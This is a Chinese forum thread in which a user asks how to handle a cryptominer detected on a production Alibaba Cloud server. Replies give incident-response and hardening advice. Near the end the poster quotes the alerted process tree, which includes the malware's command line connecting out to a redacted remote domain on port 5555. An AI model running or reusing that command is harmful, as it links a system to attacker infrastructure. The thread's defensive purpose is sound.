ecs 发现并告警了挖矿程序，你们一般是怎么处理的

格式化重装吧

@julyclyde 重装不了啊，跑着生产呢，要是我自己的，咋折腾都行

建议 SSH 换成禁用密码登录使用密钥对登录，建议手动扫描一下目录看看有没有什么可疑文件，推荐用 rkhunter
一般来说不一定是你的 ssh 被破解，要看跑的什么服务，是不是有漏洞什么的，webshell 之类的

@freaks 那你等着下次再发现吧

防火墙权限打开了，入站只保留业务必须的，ssh 限制入站 ip 。
生产环境感觉更应该备份数据，然后重装了。

找你们的安全团队，应急处置流程就行

先把外网断了，出入口都得断开，防止下载脚本和对外攻击，第二就是找恶意文件了 这个看自己排查深度，很多挖坑脚本都会改名 隐藏自己，删干净之后 再做一下密码重置 漏洞修复啥的，然后恢复外网

不能用了，换机器

@2Nfree 这个有可能，谢谢，我还收到了一个告警说：“服务器有可以程序 sysagent 开启了子 shell ， 那个命令中有一个域名解析了一个 npm 页面”

@impdx 小公司

@xiayun ecs 不知道咋断网，不允许这样操作，密码改了并禁用了密码登录，改为公钥认证， 现在只有先观察下了，之前安全组开了好多中间件和应用端口

ecs 跑 linux ，最佳实践还是全 docker 部署：linux 到手后 SSH 改密钥登录/禁密码登录，开启 ufw 防火墙，安装 docker ，然后就是全部安装在 docker 里，万一被黑，容器 compose down 再 up 一下

确实不能再用了，因为你根本无法保证清除干净
备份一下数据然后重装系统吧

日常，我以前用 vultr 搭建梯子，平均两周被挖矿病毒跑满，重装一次。
我不会搞些防病毒的东西，也懒得学。
每隔两周重装一次系统，就只装个梯子嘛，十几分钟就完成。
现在是买的机场，不知道现在 vultr 怎样了

@freaks #10 东西太多了，应急处置的东西得看具体情况来，只是告警的话，麻烦把告警贴出来，挖矿最好拿出来样本扔沙箱看会出什么东西，有没有守护进程，创建了多少个有关联的文件。一般来说扔微步/安恒沙箱就行。最后去把这些有关进程全部 kill ，删掉有关文件。顺便看下日志的情况就可以大概知道从哪里进来的，机器日志和 java 的日志都要看，才能只能大概是什么路径进来的。你也可以自己拿漏扫干一下，能随便出现挖矿这种的，一般漏扫都可以直接干出 RCE 来，都不需要手工渗透

平台和百度都有方案啊
之前经历过一次跟着百度做完的，因为业务少进程也少，那个不是自己加的一眼就看出来了
https://www.alibabacloud.com/help/zh/security-center/use-cases/best-practices-for-handling-mining-programs

@q1102389095 感谢，我看看，那天使用隔离功能清理了，cpu 占用下来了，我再深入排查下，就是不知道是不是密码泄露了，还是程序漏洞

@freaks 这种一般都是 ssh 批量弱口令爆破，很少有针对性的找某一个都是大批量的

@q1102389095 #18

父进程关系：

```bash
/usr/lib/systemd/systemd --switched-root --system --deserialize 22

/path/to/jar/sysagent -s illegal-domain:5555 -p Alphanumeric case


/usr/bin/bash
```

这个是不是要提权，先报有挖矿，后面就是这个对抗安全软件行为

@freaks 放 ai 试试吧，最近出来的也应该是 ai 批量写的